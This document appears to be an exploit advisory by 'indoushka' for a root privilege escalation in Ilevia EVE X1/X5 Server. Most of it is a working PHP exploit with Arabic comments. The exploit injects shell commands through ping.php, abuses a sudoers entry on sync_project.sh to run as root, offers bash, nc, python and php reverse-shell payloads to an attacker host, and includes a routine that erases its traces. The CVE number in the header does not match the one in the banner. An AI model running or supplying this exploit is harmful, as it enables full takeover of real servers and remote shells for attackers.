============================================================================================================================================= | # Title : Ilevia EVE X1/X5 Server 4.7.18.0.eden Root Privilege Escalation Vulnerability | | # Author : indoushka | | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) | | # Vendor : https://www.ilevia.com | ============================================================================================================================================= [+] References : https://packetstorm.news/files/id/211593/ & CVE-2025-34514 [+] Summary : A critical privilege escalation vulnerability exists in Ilevia EVE X1/X5 Server versions ≤ 4.7.18.0.eden due to improper sudoers configuration and command injection in the web interface. The vulnerability allows the www-data web user to execute arbitrary commands as root without authentication, leading to complete system compromise. [+] POC : * Usage: php ilevia_exploit.php target_url = rtrim($target_url, '/'); $this->session = curl_init(); curl_setopt_array($this->session, [ CURLOPT_RETURNTRANSFER => true, CURLOPT_FOLLOWLOCATION => true, CURLOPT_TIMEOUT => 30, CURLOPT_USERAGENT => 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36', ]); } private function request($path, $data = [], $method = 'POST') { $url = $this->target_url . $path; curl_setopt($this->session, CURLOPT_URL, $url); if ($method === 'POST') { curl_setopt($this->session, CURLOPT_POST, true); curl_setopt($this->session, CURLOPT_POSTFIELDS, http_build_query($data)); } else { curl_setopt($this->session, CURLOPT_POST, false); if (!empty($data)) { $url .= '?' . http_build_query($data); curl_setopt($this->session, CURLOPT_URL, $url); } } $response = curl_exec($this->session); return $response; } /** * استخدام ثغرة حقن الأوامر في ping.php لكتابة أمر في السكريبت */ public function injectCommand($command) { echo "[*] حقن الأمر في السكريبت...\n"; // تحويل الأمر إلى صيغة آمنة للنص $encoded_cmd = base64_encode($command); $payload = "echo '#!/bin/bash' > /tmp/exploit.sh && "; $payload .= "echo 'echo \"" . addslashes($encoded_cmd) . "\" | base64 -d | bash' >> /tmp/exploit.sh && "; $payload .= "chmod +x /tmp/exploit.sh && "; $payload .= "echo 'id' >> /home/ilevia/www-config/http/emlite/sync_project.sh && "; $payload .= "echo 'bash /tmp/exploit.sh' >> /home/ilevia/www-config/http/emlite/sync_project.sh"; $response = $this->request('/ajax/php/ping.php', [ 'ip' => "$(bash -c \"" . addslashes($payload) . "\")" ]); if ($response !== false && trim($response) === '0') { echo "[+] تم حقن الأمر بنجاح\n"; return true; } echo "[-] فشل في حقن الأمر\n"; return false; } /** * تنفيذ السكريبت المعدل باستخدام sudo */ public function executePrivileged() { echo "[*] تنفيذ السكريبت بصلاحيات الجذر...\n"; $response = $this->request('/ajax/php/ping.php', [ 'ip' => "$(sudo /home/ilevia/www-config/http/emlite/sync_project.sh > /tmp/result.txt 2>&1 && cat /tmp/result.txt)" ]); if ($response !== false) { echo "[+] تم التنفيذ بنجاح\n"; // محاولة قراءة النتيجة $result = $this->request('/ajax/php/dbcheck.php', [ 'db_log' => '/tmp/result.txt' ]); if ($result) { $data = json_decode($result, true); if (isset($data['error'])) { return $data['error']; } } return $response; } return false; } /** * تنفيذ أمر مباشر باستخدام السكريبت */ public function executeCommand($command) { echo "[*] إعداد وتنفيذ الأمر: $command\n"; // إنشاء سكريبت استغلال مؤقت $temp_script = "/tmp/cmd_" . md5(uniqid()) . ".sh"; $payload = "#!/bin/bash\n"; $payload .= "echo 'echo \\\"Executing as: \\$(id)\\\"' > $temp_script\n"; $payload .= "echo '$command' >> $temp_script\n"; $payload .= "chmod +x $temp_script\n"; $payload .= "sudo bash $temp_script > /tmp/output.txt 2>&1\n"; $payload .= "cat /tmp/output.txt"; $response = $this->request('/ajax/php/ping.php', [ 'ip' => "$(bash -c \"" . addslashes($payload) . "\")" ]); // قراءة المخرجات $output = $this->request('/ajax/php/dbcheck.php', [ 'db_log' => '/tmp/output.txt' ]); if ($output) { $data = json_decode($output, true); if (isset($data['error']) && !empty(trim($data['error']))) { return $data['error']; } } return $output ?: $response; } /** * استغلال مباشر للحصول على shell عكسي */ public function reverseShell($lhost, $lport) { echo "[*] محاولة الحصول على shell عكسي على $lhost:$lport\n"; $payloads = [ // bash reverse shell "bash -i >& /dev/tcp/$lhost/$lport 0>&1", // nc reverse shell "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc $lhost $lport >/tmp/f", // python reverse shell "python3 -c 'import socket,os,pty;s=socket.socket();s.connect((\"$lhost\",$lport));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/bash\")'", // php reverse shell "php -r '\$sock=fsockopen(\"$lhost\",$lport);exec(\"/bin/bash <&3 >&3 2>&3\");'", ]; foreach ($payloads as $i => $payload) { echo "[*] محاولة payload #" . ($i+1) . "\n"; $result = $this->executeCommand($payload); if ($result !== false) { echo "[+] تم إرسال payload بنجاح\n"; echo "[i] استمع على: nc -lvnp $lport\n"; return true; } sleep(2); } echo "[-] فشل جميع محاولات reverse shell\n"; return false; } /** * اختبار الاتصال بالهدف */ public function testConnection() { echo "[*] اختبار الاتصال بالهدف...\n"; try { $response = $this->request('/ajax/php/ping.php', [ 'ip' => '127.0.0.1' ]); if ($response !== false && trim($response) === '0') { echo "[+] الهدف متاح ويستجيب\n"; return true; } } catch (Exception $e) { echo "[-] خطأ في الاتصال: " . $e->getMessage() . "\n"; } return false; } /** * تنظيف الآثار */ public function cleanup() { echo "[*] تنظيف الآثار...\n"; $cleanup_cmd = "rm -f /tmp/exploit.sh /tmp/result.txt /tmp/output.txt /tmp/cmd_*.sh; "; $cleanup_cmd .= "sed -i '/^id$/d' /home/ilevia/www-config/http/emlite/sync_project.sh; "; $cleanup_cmd .= "sed -i '/^bash \\/tmp\\/exploit\\.sh$/d' /home/ilevia/www-config/http/emlite/sync_project.sh"; $this->request('/ajax/php/ping.php', [ 'ip' => "$(bash -c \"" . addslashes($cleanup_cmd) . "\")" ]); echo "[+] تم التنظيف\n"; } public function __destruct() { curl_close($this->session); } } // واجهة سطر الأوامر function printBanner() { echo "=============================================\n"; echo " Ilevia EVE X1/X5 Privilege Escalation Exploit\n"; echo " CVE-2025-34515 - by indoushka \n"; echo "=============================================\n\n"; } function printUsage() { echo "الاستخدام:\n"; echo " php " . basename(__FILE__) . " [options]\n\n"; echo "الخيارات:\n"; echo " --test اختبار الاتصال فقط\n"; echo " --cmd تنفيذ أمر واحد\n"; echo " --shell الحصول على reverse shell\n"; echo " --interactive وضع تفاعلي\n\n"; echo "أمثلة:\n"; echo " php ilevia_exploit.php http://192.168.1.100:8080 --test\n"; echo " php ilevia_exploit.php http://target.com --cmd \"cat /etc/passwd\"\n"; echo " php ilevia_exploit.php http://target.com --shell 192.168.1.50:4444\n"; } // التنفيذ الرئيسي if (php_sapi_name() !== 'cli') { die("هذا الاستغلال يعمل فقط من سطر الأوامر (CLI)\n"); } if ($argc < 2) { printBanner(); printUsage(); exit(1); } $target = $argv[1]; $exploit = new IleviaExploit($target); printBanner(); // اختبار الاتصال أولاً if (!$exploit->testConnection()) { echo "[-] الهدف غير متاح\n"; exit(1); } // معالجة الخيارات if ($argc >= 3) { switch ($argv[2]) { case '--test': echo "[+] اختبار الاتصال ناجح\n"; exit(0); case '--cmd': if ($argc >= 4) { $command = $argv[3]; echo "[*] تنفيذ الأمر: $command\n"; $result = $exploit->executeCommand($command); if ($result !== false) { echo "\n[+] النتيجة:\n"; echo "================================\n"; echo $result . "\n"; echo "================================\n"; } else { echo "[-] فشل التنفيذ\n"; } } break; case '--shell': if ($argc >= 4) { list($lhost, $lport) = explode(':', $argv[3]); $exploit->reverseShell($lhost, $lport); } break; case '--interactive': echo "[*] الانتقال للوضع التفاعلي\n"; echo "[i] اكتب 'exit' للخروج أو 'clean' للتنظيف\n\n"; while (true) { echo "ilevia> "; $command = trim(fgets(STDIN)); if ($command === 'exit') { break; } elseif ($command === 'clean') { $exploit->cleanup(); continue; } elseif (empty($command)) { continue; } $result = $exploit->executeCommand($command); if ($result !== false) { echo "\n" . $result . "\n\n"; } else { echo "[-] فشل التنفيذ\n"; } } break; default: printUsage(); exit(1); } } else { // الوضع الافتراضي: عرض خيارات sudo المتاحة echo "[*] جلب صلاحيات sudo للمستخدم www-data...\n"; $result = $exploit->executeCommand("sudo -l"); if ($result !== false) { echo "\n[+] صلاحيات sudo:\n"; echo "================================\n"; echo $result . "\n"; echo "================================\n"; } echo "\n[i] للمزيد من الخيارات، استخدم --help\n"; } // تنظيف خفيف في النهاية $exploit->cleanup(); echo "\n[+] انتهى التنفيذ\n"; ?> Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================